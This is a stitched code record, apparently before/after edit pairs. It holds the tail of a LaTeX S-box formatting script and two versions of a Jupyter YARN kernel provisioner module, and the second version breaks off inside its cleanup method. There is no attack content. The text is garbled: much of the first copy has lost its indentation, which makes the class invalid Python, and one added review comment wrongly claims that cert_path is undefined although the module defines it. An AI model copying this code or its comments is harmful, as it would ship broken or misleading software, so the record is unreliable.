    # One five-column multicols environment per S-box layer.
    return ('\\begin{multicols}{5}\n'
            + f'[{title}\n]\n'
            + r'\noindent'
            + '\n'.join(rows) + '\n'
            + '\\end{multicols}\n')

s = (_layer('Top linear layer', sort_assign(map(format_assign, s_in.splitlines()))) + '\n'
     + _layer('Middle non-linear layer', exp) + '\n'
     + _layer('Bottom linear layer', exp_out))
print(s)
|
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
"""Code related to managing kernels running in YARN clusters."""
import asyncio
import errno
import logging
import os
import signal
import socket
import time
from traitlets import default, Unicode, Bool
from typing import Any, Dict, List, Optional, Tuple
from yarn_api_client.resource_manager import ResourceManager
from .remote_provisioner import RemoteProvisionerBase
# Default logging level of yarn-api and underlying connectionpool produce too much noise - raise to warning only.
logging.getLogger('yarn_api_client').setLevel(os.getenv('YP_YARN_LOG_LEVEL', logging.WARNING))
logging.getLogger('urllib3.connectionpool').setLevel(os.environ.get('YP_YARN_LOG_LEVEL', logging.WARNING))
poll_interval = float(os.getenv('EG_POLL_INTERVAL', '0.5'))
max_poll_attempts = int(os.getenv('EG_MAX_POLL_ATTEMPTS', '10'))
yarn_shutdown_wait_time = float(os.getenv('RP_YARN_SHUTDOWN_WAIT_TIME', '15.0'))
# cert_path: Boolean, defaults to `True`, that controls
# whether we verify the server's TLS certificate in yarn-api-client.
# Or a string, in which case it must be a path to a CA bundle(.pem file) to use.
cert_path = os.getenv('EG_YARN_CERT_BUNDLE', True)
class YarnProvisioner(RemoteProvisionerBase):
"""
Kernel lifecycle management for YARN clusters.
"""
yarn_endpoint_env = 'RP_YARN_ENDPOINT'
yarn_endpoint = Unicode(None, config=True, allow_none=True,
help="""The http url specifying the YARN Resource Manager. Note: If this value is NOT set,
the YARN library will use the files within the local HADOOP_CONFIG_DIR to determine the
active resource manager. (RP_YARN_ENDPOINT env var)""")
@default('yarn_endpoint')
def yarn_endpoint_default(self):
return os.getenv(self.yarn_endpoint_env)
# Alt Yarn endpoint
alt_yarn_endpoint_env = 'RP_ALT_YARN_ENDPOINT'
alt_yarn_endpoint = Unicode(None, config=True, allow_none=True,
help="""The http url specifying the alternate YARN Resource Manager. This value should
be set when YARN Resource Managers are configured for high availability. Note: If both
YARN endpoints are NOT set, the YARN library will use the files within the local
HADOOP_CONFIG_DIR to determine the active resource manager.
(RP_ALT_YARN_ENDPOINT env var)""")
@default('alt_yarn_endpoint')
def alt_yarn_endpoint_default(self):
return os.getenv(self.alt_yarn_endpoint_env)
yarn_endpoint_security_enabled_env = 'RP_YARN_ENDPOINT_SECURITY_ENABLED'
yarn_endpoint_security_enabled_default_value = False
yarn_endpoint_security_enabled = Bool(yarn_endpoint_security_enabled_default_value, config=True,
help="""Is YARN Kerberos/SPNEGO Security enabled (True/False).
(RP_YARN_ENDPOINT_SECURITY_ENABLED env var)""")
@default('yarn_endpoint_security_enabled')
def yarn_endpoint_security_enabled_default(self):
    """Derive the traitlet default from the env var, treating common
    false-y spellings as False.

    BUG FIX: the previous implementation returned ``bool(os.getenv(...))``,
    which is True for ANY non-empty string -- including 'False' and '0'.
    """
    value = os.getenv(self.yarn_endpoint_security_enabled_env)
    if value is None:
        return self.yarn_endpoint_security_enabled_default_value
    return value.strip().lower() in ('true', '1', 'yes', 'y')
initial_states = {'NEW', 'SUBMITTED', 'ACCEPTED', 'RUNNING'}
final_states = {'FINISHED', 'KILLED', 'FAILED'}
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.application_id = None
self.last_known_state = None
self.candidate_queue = None
self.candidate_partition = None
endpoints = None
if self.yarn_endpoint:
endpoints = [self.yarn_endpoint]
# Only check alternate if "primary" is set.
if self.alt_yarn_endpoint:
endpoints.append(self.alt_yarn_endpoint)
auth = None
if self.yarn_endpoint_security_enabled:
from requests_kerberos import HTTPKerberosAuth
auth = HTTPKerberosAuth()
self.resource_mgr = ResourceManager(service_endpoints=endpoints, auth=auth, verify=cert_path)
self.rm_addr = self.resource_mgr.get_active_endpoint()
# If yarn resource check is enabled and it isn't available immediately,
# 20% of kernel_launch_timeout is used to wait
# and retry at fixed interval before pronouncing as not feasible to launch.
self.yarn_resource_check_wait_time = 0.20 * self.launch_timeout
async def pre_launch(self, **kwargs: Any) -> Dict[str, Any]:
"""
Launches the specified process within a YARN cluster environment.
"""
self.application_id = None
self.last_known_state = None
self.candidate_queue = None
self.candidate_partition = None
kwargs = await super().pre_launch(**kwargs)
# checks to see if the queue resource is available
# if not available, kernel startup is not attempted
self.confirm_yarn_queue_availability(**kwargs)
return kwargs
def log_kernel_launch(self, cmd: List[str]) -> None:
self.log.info(f"{self.__class__.__name__}: kernel launched. YARN RM: {self.rm_addr}, "
f"pid: {self.local_proc.pid}, Kernel ID: {self.kernel_id}, cmd: '{cmd}'")
def get_shutdown_wait_time(self, recommended: Optional[float] = 5.0) -> float:
    """Return the number of seconds allowed for a complete shutdown.

    YARN applications usually need longer than the kernel manager's default
    5-second grace period, so the configured ``yarn_shutdown_wait_time``
    (RP_YARN_SHUTDOWN_WAIT_TIME, default 15s) acts as a floor on the
    recommendation; a larger recommendation is returned unchanged.
    """
    if recommended >= yarn_shutdown_wait_time:
        return recommended
    # Stretch the wait to the YARN-specific minimum and note the adjustment.
    self.log.debug(f"{type(self).__name__} shutdown wait time adjusted to {yarn_shutdown_wait_time} seconds.")
    return yarn_shutdown_wait_time
def confirm_yarn_queue_availability(self, **kwargs: Dict[str, Any]) -> None:
    """Confirm the target YARN queue/partition can host the kernel before launch.

    Submitting to a saturated queue can leave orphaned applications behind,
    so two optional up-front checks are driven by the kernel env:

    1. If KERNEL_EXECUTOR_MEMORY and KERNEL_DRIVER_MEMORY are both set,
       verify each fits within the cluster's container memory limit.
    2. If KERNEL_QUEUE and KERNEL_NODE_LABEL are both set, verify the
       queue's partition has used capacity <= YARN_PARTITION_THRESHOLD
       (default 95%), polling for up to ``yarn_resource_check_wait_time``
       (20% of the launch timeout) before giving up.

    Time spent polling is subtracted from ``launch_timeout`` so the total
    launch budget is preserved.

    :param kwargs: launch keyword arguments; only kwargs['env'] is consulted.
    """
    env_dict = kwargs.get('env', {})
    executor_memory = int(env_dict.get('KERNEL_EXECUTOR_MEMORY', 0))
    driver_memory = int(env_dict.get('KERNEL_DRIVER_MEMORY', 0))
    if executor_memory * driver_memory > 0:  # both values present and non-zero
        container_memory = self.resource_mgr.cluster_node_container_memory()
        if max(executor_memory, driver_memory) > container_memory:
            self.log_and_raise(ValueError("Container Memory not sufficient for a executor/driver allocation"))

    candidate_queue_name = env_dict.get('KERNEL_QUEUE', None)
    node_label = env_dict.get('KERNEL_NODE_LABEL', None)
    partition_availability_threshold = float(env_dict.get('YARN_PARTITION_THRESHOLD', 95.0))
    if candidate_queue_name is None or node_label is None:
        return

    # Resources may become available if we wait - start the timeout clock.
    self.start_time = RemoteProvisionerBase.get_current_time()
    self.candidate_queue = self.resource_mgr.cluster_scheduler_queue(candidate_queue_name)
    if self.candidate_queue is None:
        self.log.warning(f"Queue: {candidate_queue_name} not found in cluster. "
                         "Availability check will not be performed")
        return
    self.candidate_partition = self.resource_mgr.cluster_queue_partition(self.candidate_queue, node_label)
    if self.candidate_partition is None:
        # FIX: added the missing space between sentences in this message.
        self.log.debug(f"Partition: {node_label} not found in {candidate_queue_name} queue. "
                       "Availability check will not be performed")
        return

    self.log.debug(f"Checking endpoint: {self.yarn_endpoint} if partition: {self.candidate_partition} "
                   f"has used capacity <= {partition_availability_threshold}%")
    yarn_available = self.resource_mgr.cluster_scheduler_queue_availability(self.candidate_partition,
                                                                            partition_availability_threshold)
    if not yarn_available:
        # FIX: the wait time is measured in seconds (see
        # handle_yarn_queue_timeout), not milliseconds as previously logged.
        self.log.debug(
            f"Retrying for {self.yarn_resource_check_wait_time} seconds since resources are not available")
        while not yarn_available:
            self.handle_yarn_queue_timeout()
            yarn_available = self.resource_mgr.cluster_scheduler_queue_availability(
                self.candidate_partition, partition_availability_threshold)

    # Subtract the time spent polling for queue availability from the launch timeout.
    self.launch_timeout -= RemoteProvisionerBase.get_time_diff(self.start_time)
def handle_yarn_queue_timeout(self) -> None:
    """Sleep one poll interval, then raise TimeoutError if the total time
    spent waiting for queue availability exceeds the allotted window
    (``yarn_resource_check_wait_time``, i.e. 20% of the launch timeout)."""
    time.sleep(poll_interval)
    time_interval = RemoteProvisionerBase.get_time_diff(self.start_time)
    if time_interval > self.yarn_resource_check_wait_time:
        reason = f"Yarn Compute Resource is unavailable after {self.yarn_resource_check_wait_time} seconds"
        # log_and_raise logs the error and raises it to abort the launch.
        self.log_and_raise(TimeoutError(reason))
@property
def has_process(self) -> bool:
    """True while we can still influence the kernel: either a local launcher
    process exists or a YARN application id has been assigned."""
    return not (self.local_proc is None and self.application_id is None)
async def poll(self) -> Optional[int]:
    """Return None while the application appears to be running, else 0.

    A freshly submitted YARN app may take a while to be ACCEPTED, so any
    'initial' state (NEW/SUBMITTED/ACCEPTED/RUNNING) is treated as alive;
    a missing application id or a final state yields 0.
    """
    if not self._get_application_id():
        return 0
    state = self._query_app_state_by_id(self.application_id)
    return None if state in YarnProvisioner.initial_states else 0
async def send_signal(self, signum: int) -> None:
    """Dispatch a signal to the kernel: 0 acts as a liveness poll, SIGKILL
    kills the application, anything else is forwarded remotely.

    :param signum: signal number to deliver
    """
    if signum == 0:
        return await self.poll()
    if signum == signal.SIGKILL:
        return await self.kill()
    # YARN's API has no interrupt equivalent, so fall back to a remote
    # signal via the superclass.  We deliberately don't compare against a
    # specific interrupt signal because alternate ones may be configured.
    return await super().send_signal(signum)
async def kill(self, restart: bool = False) -> None:
"""Kill a kernel.
:return: None if the application existed and is not in RUNNING state, False otherwise.
"""
state = None
result = False
if self._get_application_id():
result, state = await self.shutdown_application()
if result is False: # We couldn't terminate via Yarn, try remote signal
result = await super().send_signal(signal.SIGKILL) # Must use super here, else infinite
self.log.debug(f"YarnProvisioner.kill, application ID: {self.application_id}, "
f"kernel ID: {self.kernel_id}, state: {state}, result: {result}")
return result
async def terminate(self, restart: bool = False) -> None:
"""Terminate a kernel.
Similar to kill except that the follow-on kill step is not taken if termination is not confirmed.
"""
state = None
result = False
if self._get_application_id():
result, state = await self.shutdown_application()
self.log.debug(f"YarnProvisioner.terminate, application ID: {self.application_id}, "
f"kernel ID: {self.kernel_id}, state: {state}, result: {result}")
return result
async def shutdown_application(self) -> Tuple[Optional[bool], str]:
"""Shuts down the YARN application, returning None if final state is confirmed, False otherwise."""
result = False
self._kill_app_by_id(self.application_id)
# Check that state has moved to a final state (most likely KILLED)
i = 1
state = self._query_app_state_by_id(self.application_id)
while state not in YarnProvisioner.final_states and i <= max_poll_attempts:
await asyncio.sleep(poll_interval)
state = self._query_app_state_by_id(self.application_id)
i = i + 1
if state in YarnProvisioner.final_states:
result = None
return result, state
async def cleanup(self, restart: bool = False):
""""""
# we might have a defunct process (if using waitAppCompletion = false) - so poll, kill, wait when we have
# a local_proc.
if self.local_proc:
self.log.debug(f"YarnProvisioner.cleanup: Clearing possible defunct "
f"process, pid={self.local_proc.pid}...")
if self.local_proc.poll():
self.local_proc.kill()
self.local_proc.wait()
self.local_proc = None
# reset application id to force new query - handles kernel restarts/interrupts
self.application_id = None
# for cleanup, we should call the superclass last
await super().cleanup(restart=restart)
async def confirm_remote_startup(self):
"""
Confirms the yarn application is in a started state before returning.
Should post-RUNNING states be unexpectedly encountered (FINISHED, KILLED, FAILED)
then we must throw, otherwise the rest of the gateway will believe its talking
to a valid kernel.
Note: This is a complete override of the superclass method.
"""
self.start_time = RemoteProvisionerBase.get_current_time()
i = 0
ready_to_connect = False # we're ready to connect when we have a connection file to use
while not ready_to_connect:
i += 1
await self.handle_launch_timeout()
if self._get_application_id(True):
# Once we have an application ID, start monitoring state, obtain assigned host and get connection info
app_state = self._get_application_state()
if app_state in YarnProvisioner.final_states:
error_message = f"KernelID: '{self.kernel_id}', ApplicationID: '{self.application_id}' " \
f"unexpectedly found in state '{app_state}' during kernel startup!"
self.log_and_raise(RuntimeError(error_message))
self.log.debug(f"{i}: State: '{app_state}', Host: '{self.assigned_host}', "
f"KernelID: '{self.kernel_id}', ApplicationID: '{self.application_id}'")
if self.assigned_host != '':
ready_to_connect = await self.receive_connection_info()
else:
self.detect_launch_failure()
async def handle_launch_timeout(self):
"""
Checks to see if the kernel launch timeout has been exceeded while awaiting connection info.
Note: This is a complete override of the superclass method.
"""
await asyncio.sleep(poll_interval)
time_interval = RemoteProvisionerBase.get_time_diff(self.start_time)
if time_interval > self.launch_timeout:
reason = f"Application ID is None. Failed to submit a new application to YARN within " \
f"{self.launch_timeout} seconds. Check server log for more information."
if self._get_application_id(True):
if self._query_app_state_by_id(self.application_id) != "RUNNING":
reason = f"YARN resources unavailable after {time_interval} seconds for " \
f"app {self.application_id}, launch timeout: {self.launch_timeout}! " \
"Check YARN configuration."
else:
reason = f"App {self.application_id} is RUNNING, but waited too long " \
f"({self.launch_timeout} secs) to get connection file. " \
f"Check YARN logs for more information."
await self.kill()
timeout_message = f"KernelID: '{self.kernel_id}' launch timeout due to: {reason}"
self.log_and_raise(TimeoutError(timeout_message))
async def get_provisioner_info(self) -> Dict:
"""Captures the base information necessary for kernel persistence relative to YARN clusters."""
provisioner_info = await super().get_provisioner_info()
provisioner_info.update({'application_id': self.application_id})
return provisioner_info
async def load_provisioner_info(self, provisioner_info: Dict) -> None:
"""Loads the base information necessary for kernel persistence relative to YARN clusters."""
await super().load_provisioner_info(provisioner_info)
self.application_id = provisioner_info['application_id']
def _get_application_state(self) -> str:
# Gets the current application state using the application_id already obtained. Once the assigned host
# has been identified, 'amHostHttpAddress' is nolonger accessed.
app_state = self.last_known_state
app = self._query_app_by_id(self.application_id)
if app:
if app.get('state'):
app_state = app.get('state')
self.last_known_state = app_state
if self.assigned_host == '' and app.get('amHostHttpAddress'):
self.assigned_host = app.get('amHostHttpAddress').split(':')[0]
# Set the kernel manager ip to the actual host where the application landed.
self.assigned_ip = socket.gethostbyname(self.assigned_host)
return app_state
def _get_application_id(self, ignore_final_states: bool = False) -> str:
    """Return the kernel's YARN application id, or None if not yet assigned.

    When discovering the id for the first time, kernels already in a final
    state (FINISHED/KILLED/FAILED) can be skipped via *ignore_final_states*
    so that a stale application from a previous run is not adopted.
    """
    if not self.application_id:
        app = self._query_app_by_name(self.kernel_id)
        state_condition = True
        if type(app) is dict:
            state = app.get('state')
            self.last_known_state = state
            if ignore_final_states:
                state_condition = state not in YarnProvisioner.final_states
            if len(app.get('id', '')) > 0 and state_condition:
                self.application_id = app['id']
                time_interval = RemoteProvisionerBase.get_time_diff(self.start_time)
                # BUG FIX: app["id"] inside a double-quoted f-string reuses
                # the outer quote character -- a SyntaxError before Python
                # 3.12.  Use single quotes for the subscript instead.
                self.log.info(f"ApplicationID: '{app['id']}' assigned for KernelID: '{self.kernel_id}', "
                              f"state: {state}, {time_interval} seconds after starting.")
        if not self.application_id:
            self.log.debug(f"ApplicationID not yet assigned for KernelID: '{self.kernel_id}' - retrying...")
    return self.application_id
def _query_app_by_name(self, kernel_id: str) -> dict:
"""Retrieve application by using kernel_id as the unique app name.
With the started_time_begin as a parameter to filter applications started earlier than the target one from YARN.
When submit a new app, it may take a while for YARN to accept and run and generate the application ID.
Note: if a kernel restarts with the same kernel id as app name, multiple applications will be returned.
For now, the app/kernel with the top most application ID will be returned as the target app, assuming the app
ID will be incremented automatically on the YARN side.
:param kernel_id: as the unique app name for query
:return: The JSON object of an application.
"""
top_most_app_id = ''
target_app = None
try:
response = self.resource_mgr.cluster_applications(started_time_begin=str(self.start_time))
except socket.error as sock_err:
if sock_err.errno == errno.ECONNREFUSED:
self.log.warning(f"YARN RM address: '{self.rm_addr}' refused the connection. "
f"Is the resource manager running?")
else:
self.log.warning(f"Query for kernel ID '{kernel_id}' failed with exception: "
f"{type(sock_err)} - '{sock_err}'. Continuing...")
except Exception as e:
self.log.warning(f"Query for kernel ID '{kernel_id}' failed with exception: "
f"{type(e)} - '{e}'. Continuing...")
else:
data = response.data
if type(data) is dict and type(data.get("apps")) is dict and 'app' in data.get("apps"):
for app in data['apps']['app']:
if app.get('name', '').find(kernel_id) >= 0 and app.get('id') > top_most_app_id:
target_app = app
top_most_app_id = app.get('id')
return target_app
def _query_app_by_id(self, app_id: str) -> dict:
"""Retrieve an application by application ID.
:param app_id
:return: The JSON object of an application.
"""
app = None
try:
response = self.resource_mgr.cluster_application(application_id=app_id)
except Exception as e:
self.log.warning(f"Query for application ID '{app_id}' failed with exception: '{e}'. Continuing...")
else:
data = response.data
if type(data) is dict and 'app' in data:
app = data['app']
return app
def _query_app_state_by_id(self, app_id: str) -> str:
    """Return the application's current state, falling back to the last
    known state when the ResourceManager query fails.

    :param app_id: YARN application id to query
    :return: application state (str)
    """
    try:
        response = self.resource_mgr.cluster_application_state(application_id=app_id)
    except Exception as e:
        self.log.warning(f"Query for application '{app_id}' state failed with exception: '{e}'. "
                         f"Continuing with last known state = '{self.last_known_state}'...")
        return self.last_known_state
    # Cache the fresh state so later failures can fall back to it.
    self.last_known_state = response.data['state']
    return self.last_known_state
def _kill_app_by_id(self, app_id: str) -> dict:
    """Ask the ResourceManager to kill *app_id* (best-effort).

    Applications already FINISHED or FAILED keep their state -- YARN will
    not move them to KILLED.

    :param app_id: YARN application id to kill
    :return: the RM's response to the kill request, or {} if the call failed
    """
    try:
        return self.resource_mgr.cluster_application_kill(application_id=app_id)
    except Exception as e:
        self.log.warning(f"Termination of application '{app_id}' failed with exception: '{e}'. Continuing...")
        return {}
| # Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
"""Code related to managing kernels running in YARN clusters."""
import asyncio
import errno
import logging
import os
import signal
import socket
import time
from traitlets import default, Unicode, Bool
from typing import Any, Dict, List, Optional, Tuple
from yarn_api_client.resource_manager import ResourceManager
from .remote_provisioner import RemoteProvisionerBase
# Default logging level of yarn-api and underlying connectionpool produce too much noise - raise to warning only.
logging.getLogger('yarn_api_client').setLevel(os.getenv('YP_YARN_LOG_LEVEL', logging.WARNING))
logging.getLogger('urllib3.connectionpool').setLevel(os.environ.get('YP_YARN_LOG_LEVEL', logging.WARNING))
poll_interval = float(os.getenv('EG_POLL_INTERVAL', '0.5'))
max_poll_attempts = int(os.getenv('EG_MAX_POLL_ATTEMPTS', '10'))
yarn_shutdown_wait_time = float(os.getenv('RP_YARN_SHUTDOWN_WAIT_TIME', '15.0'))
# cert_path: Boolean, defaults to `True`, that controls
# whether we verify the server's TLS certificate in yarn-api-client.
# Or a string, in which case it must be a path to a CA bundle(.pem file) to use.
cert_path = os.getenv('EG_YARN_CERT_BUNDLE', True)
class YarnProvisioner(RemoteProvisionerBase):
"""
Kernel lifecycle management for YARN clusters.
"""
yarn_endpoint_env = 'RP_YARN_ENDPOINT'
yarn_endpoint = Unicode(None, config=True, allow_none=True,
help="""The http url specifying the YARN Resource Manager. Note: If this value is NOT set,
the YARN library will use the files within the local HADOOP_CONFIG_DIR to determine the
active resource manager. (RP_YARN_ENDPOINT env var)""")
@default('yarn_endpoint')
def yarn_endpoint_default(self):
return os.getenv(self.yarn_endpoint_env)
# Alt Yarn endpoint
alt_yarn_endpoint_env = 'RP_ALT_YARN_ENDPOINT'
alt_yarn_endpoint = Unicode(None, config=True, allow_none=True,
help="""The http url specifying the alternate YARN Resource Manager. This value should
be set when YARN Resource Managers are configured for high availability. Note: If both
YARN endpoints are NOT set, the YARN library will use the files within the local
HADOOP_CONFIG_DIR to determine the active resource manager.
(RP_ALT_YARN_ENDPOINT env var)""")
@default('alt_yarn_endpoint')
def alt_yarn_endpoint_default(self):
return os.getenv(self.alt_yarn_endpoint_env)
yarn_endpoint_security_enabled_env = 'RP_YARN_ENDPOINT_SECURITY_ENABLED'
yarn_endpoint_security_enabled_default_value = False
yarn_endpoint_security_enabled = Bool(yarn_endpoint_security_enabled_default_value, config=True,
help="""Is YARN Kerberos/SPNEGO Security enabled (True/False).
(RP_YARN_ENDPOINT_SECURITY_ENABLED env var)""")
@default('yarn_endpoint_security_enabled')
def yarn_endpoint_security_enabled_default(self):
    """Derive the traitlet default from the env var, treating common
    false-y spellings as False.

    BUG FIX: the previous implementation returned ``bool(os.getenv(...))``,
    which is True for ANY non-empty string -- including 'False' and '0'.
    """
    value = os.getenv(self.yarn_endpoint_security_enabled_env)
    if value is None:
        return self.yarn_endpoint_security_enabled_default_value
    return value.strip().lower() in ('true', '1', 'yes', 'y')
initial_states = {'NEW', 'SUBMITTED', 'ACCEPTED', 'RUNNING'}
final_states = {'FINISHED', 'KILLED', 'FAILED'}
def __init__(self, **kwargs):
    """Initialize the provisioner and build the YARN ResourceManager client."""
    super().__init__(**kwargs)
    # Per-kernel YARN state; reset again in pre_launch for each launch.
    self.application_id = None
    self.last_known_state = None
    self.candidate_queue = None
    self.candidate_partition = None
    # None => let the YARN library discover endpoints via HADOOP_CONFIG_DIR.
    endpoints = None
    if self.yarn_endpoint:
        endpoints = [self.yarn_endpoint]
        # Only check alternate if "primary" is set.
        if self.alt_yarn_endpoint:
            endpoints.append(self.alt_yarn_endpoint)
    auth = None
    if self.yarn_endpoint_security_enabled:
        # Imported lazily so requests_kerberos is only required when security is on.
        from requests_kerberos import HTTPKerberosAuth
        auth = HTTPKerberosAuth()
    # NOTE(review): `cert_path` is not defined anywhere in this view —
    # presumably a module-level setting; verify it is in scope.
    self.resource_mgr = ResourceManager(service_endpoints=endpoints, auth=auth, verify=cert_path)
    self.rm_addr = self.resource_mgr.get_active_endpoint()
    # If yarn resource check is enabled and it isn't available immediately,
    # 20% of kernel_launch_timeout is used to wait
    # and retry at fixed interval before pronouncing as not feasible to launch.
    self.yarn_resource_check_wait_time = 0.20 * self.launch_timeout
async def pre_launch(self, **kwargs: Any) -> Dict[str, Any]:
    """
    Launches the specified process within a YARN cluster environment.

    Resets per-launch YARN state, delegates to the superclass, then verifies
    the target YARN queue has capacity before any launch is attempted.
    """
    # Reset per-launch state so a restart does not reuse a stale application id.
    self.application_id = None
    self.last_known_state = None
    self.candidate_queue = None
    self.candidate_partition = None
    kwargs = await super().pre_launch(**kwargs)
    # checks to see if the queue resource is available
    # if not available, kernel startup is not attempted
    self.confirm_yarn_queue_availability(**kwargs)
    return kwargs
def log_kernel_launch(self, cmd: List[str]) -> None:
    """Log one INFO line describing the launched kernel: RM address, local pid, kernel id and command."""
    message = (
        f"{self.__class__.__name__}: kernel launched. YARN RM: {self.rm_addr}, "
        f"pid: {self.local_proc.pid}, Kernel ID: {self.kernel_id}, cmd: '{cmd}'"
    )
    self.log.info(message)
def get_shutdown_wait_time(self, recommended: Optional[float] = 5.0) -> float:
    """Returns the time allowed for a complete shutdown. This may vary by provisioner.
    The recommended value will typically be what is configured in the kernel manager.
    """
    # YARN applications tend to take longer than the default 5 second wait time. Rather than
    # require a command-line option for those using YARN, we'll adjust based on a local env that
    # defaults to 15 seconds. Note: we'll only adjust if the current wait time is shorter than
    # the desired value.
    if recommended >= yarn_shutdown_wait_time:
        return recommended
    recommended = yarn_shutdown_wait_time
    self.log.debug(f"{type(self).__name__} shutdown wait time adjusted to {recommended} seconds.")
    return recommended
def confirm_yarn_queue_availability(self, **kwargs: Dict[str, Any]) -> None:
    """
    Submitting jobs to yarn queue and then checking till the jobs are in running state
    will lead to orphan jobs being created in some scenarios.
    We take kernel_launch_timeout time and divide this into two parts.
    If the queue is unavailable we take max 20% of the time to poll the queue periodically
    and if the queue becomes available the rest of timeout is met in 80% of the remaining
    time.
    This algorithm is subject to change. Please read the below cases to understand
    when and how checks are applied.
    Confirms if the yarn queue has capacity to handle the resource requests that
    will be sent to it.
    First check ensures the driver and executor memory request falls within
    the container size of yarn configuration. This check requires executor and
    driver memory to be available in the env.
    Second check takes into consideration node label partitioning on given
    queues. Provided the queue name and node label, this checks if the given
    partition has capacity available for kernel startup.
    All checks are optional. If KERNEL_EXECUTOR_MEMORY and KERNEL_DRIVER_MEMORY
    are specified, the first check is performed.
    If KERNEL_QUEUE and KERNEL_NODE_LABEL are specified, the second check is performed.
    Proper error messages are sent back for user experience.
    :param kwargs: launch keyword arguments; only the 'env' dict is consulted
    :return: None (raises via log_and_raise on failure)
    """
    env_dict = kwargs.get('env', {})
    executor_memory = int(env_dict.get('KERNEL_EXECUTOR_MEMORY', 0))
    driver_memory = int(env_dict.get('KERNEL_DRIVER_MEMORY', 0))
    # Both values must be present (non-zero) for the memory check to apply.
    if executor_memory * driver_memory > 0:
        container_memory = self.resource_mgr.cluster_node_container_memory()
        if max(executor_memory, driver_memory) > container_memory:
            self.log_and_raise(ValueError("Container Memory not sufficient for a executor/driver allocation"))
    candidate_queue_name = (env_dict.get('KERNEL_QUEUE', None))
    node_label = env_dict.get('KERNEL_NODE_LABEL', None)
    partition_availability_threshold = float(env_dict.get('YARN_PARTITION_THRESHOLD', 95.0))
    # Partition check requires both queue name and node label.
    if candidate_queue_name is None or node_label is None:
        return
    # else the resources may or may not be available now. it may be possible that if we wait then the resources
    # become available. start a timeout process
    self.start_time = RemoteProvisionerBase.get_current_time()
    self.candidate_queue = self.resource_mgr.cluster_scheduler_queue(candidate_queue_name)
    if self.candidate_queue is None:
        self.log.warning(f"Queue: {candidate_queue_name} not found in cluster. "
                         "Availability check will not be performed")
        return
    self.candidate_partition = self.resource_mgr.cluster_queue_partition(self.candidate_queue, node_label)
    if self.candidate_partition is None:
        self.log.debug(f"Partition: {node_label} not found in {candidate_queue_name} queue."
                       "Availability check will not be performed")
        return
    self.log.debug(f"Checking endpoint: {self.yarn_endpoint} if partition: {self.candidate_partition} "
                   f"has used capacity <= {partition_availability_threshold}%")
    yarn_available = self.resource_mgr.cluster_scheduler_queue_availability(self.candidate_partition,
                                                                            partition_availability_threshold)
    if not yarn_available:
        self.log.debug(
            f"Retrying for {self.yarn_resource_check_wait_time} ms since resources are not available")
        # Poll until capacity frees up; handle_yarn_queue_timeout raises once
        # the 20% budget (yarn_resource_check_wait_time) is exhausted.
        while not yarn_available:
            self.handle_yarn_queue_timeout()
            yarn_available = self.resource_mgr.cluster_scheduler_queue_availability(
                self.candidate_partition, partition_availability_threshold)
    # subtracting the total amount of time spent for polling for queue availability
    self.launch_timeout -= RemoteProvisionerBase.get_time_diff(self.start_time)
def handle_yarn_queue_timeout(self) -> None:
    """Sleep one poll interval, then raise (via log_and_raise) once the queue-availability budget is spent."""
    time.sleep(poll_interval)
    elapsed = RemoteProvisionerBase.get_time_diff(self.start_time)
    if elapsed <= self.yarn_resource_check_wait_time:
        return
    reason = f"Yarn Compute Resource is unavailable after {self.yarn_resource_check_wait_time} seconds"
    self.log_and_raise(TimeoutError(reason))
@property
def has_process(self) -> bool:
    """True while either a local launcher process or a YARN application id is known."""
    local_proc_exists = self.local_proc is not None
    app_id_known = self.application_id is not None
    return local_proc_exists or app_id_known
async def poll(self) -> Optional[int]:
    """Submitting a new kernel/app to YARN will take a while to be ACCEPTED.
    Thus application ID will probably not be available immediately for poll.
    So will regard the application as RUNNING when application ID still in ACCEPTED or SUBMITTED state.
    :return: None if the application's ID is available and state is ACCEPTED/SUBMITTED/RUNNING. Otherwise 0.
    """
    result = 0  # 0 => "not running" to the caller; None => "alive"
    if self._get_application_id():
        state = self._query_app_state_by_id(self.application_id)
        if state in YarnProvisioner.initial_states:
            result = None
    # The following produces too much output (every 3 seconds by default), so commented-out at this time.
    # self.log.debug("YarnProcessProxy.poll, application ID: {}, kernel ID: {}, state: {}".
    #                format(self.application_id, self.kernel_id, state))
    return result
async def send_signal(self, signum: int) -> None:
    """Currently only support 0 as poll and other as kill.
    :param signum
    :return:
    """
    # Dispatch with guard clauses: 0 -> poll, SIGKILL -> kill, else delegate.
    if signum == 0:
        return await self.poll()
    if signum == signal.SIGKILL:
        return await self.kill()
    # Yarn api doesn't support the equivalent to interrupts, so take our chances
    # via a remote signal. Note that this condition cannot check against the
    # signum value because alternate interrupt signals might be in play.
    return await super().send_signal(signum)
async def kill(self, restart: bool = False) -> Optional[bool]:
    """Kill a kernel.
    :return: None if the application existed and is not in RUNNING state, False otherwise.
    """
    # NOTE: annotation corrected from `-> None`; the method returns
    # None (confirmed terminal) / False (not confirmed) per the docstring.
    state = None
    result = False
    if self._get_application_id():
        result, state = await self.shutdown_application()
    if result is False:  # We couldn't terminate via Yarn, try remote signal
        result = await super().send_signal(signal.SIGKILL)  # Must use super here, else infinite
    self.log.debug(f"YarnProvisioner.kill, application ID: {self.application_id}, "
                   f"kernel ID: {self.kernel_id}, state: {state}, result: {result}")
    return result
async def terminate(self, restart: bool = False) -> Optional[bool]:
    """Terminate a kernel.
    Similar to kill except that the follow-on kill step is not taken if termination is not confirmed.
    """
    # NOTE: annotation corrected from `-> None`; returns None/False like kill().
    state = None
    result = False
    if self._get_application_id():
        result, state = await self.shutdown_application()
    self.log.debug(f"YarnProvisioner.terminate, application ID: {self.application_id}, "
                   f"kernel ID: {self.kernel_id}, state: {state}, result: {result}")
    return result
async def shutdown_application(self) -> Tuple[Optional[bool], str]:
    """Shuts down the YARN application, returning None if final state is confirmed, False otherwise."""
    result = False
    self._kill_app_by_id(self.application_id)
    # Check that state has moved to a final state (most likely KILLED)
    i = 1
    state = self._query_app_state_by_id(self.application_id)
    # Poll up to max_poll_attempts (module-level constant, outside this view)
    # sleeping poll_interval between queries.
    while state not in YarnProvisioner.final_states and i <= max_poll_attempts:
        await asyncio.sleep(poll_interval)
        state = self._query_app_state_by_id(self.application_id)
        i = i + 1
    if state in YarnProvisioner.final_states:
        result = None  # None signals confirmed termination to kill()/terminate()
    return result, state
async def cleanup(self, restart: bool = False):
    """Clean up local process and YARN bookkeeping after kernel termination."""
    # we might have a defunct process (if using waitAppCompletion = false) - so poll, kill, wait when we have
    # a local_proc.
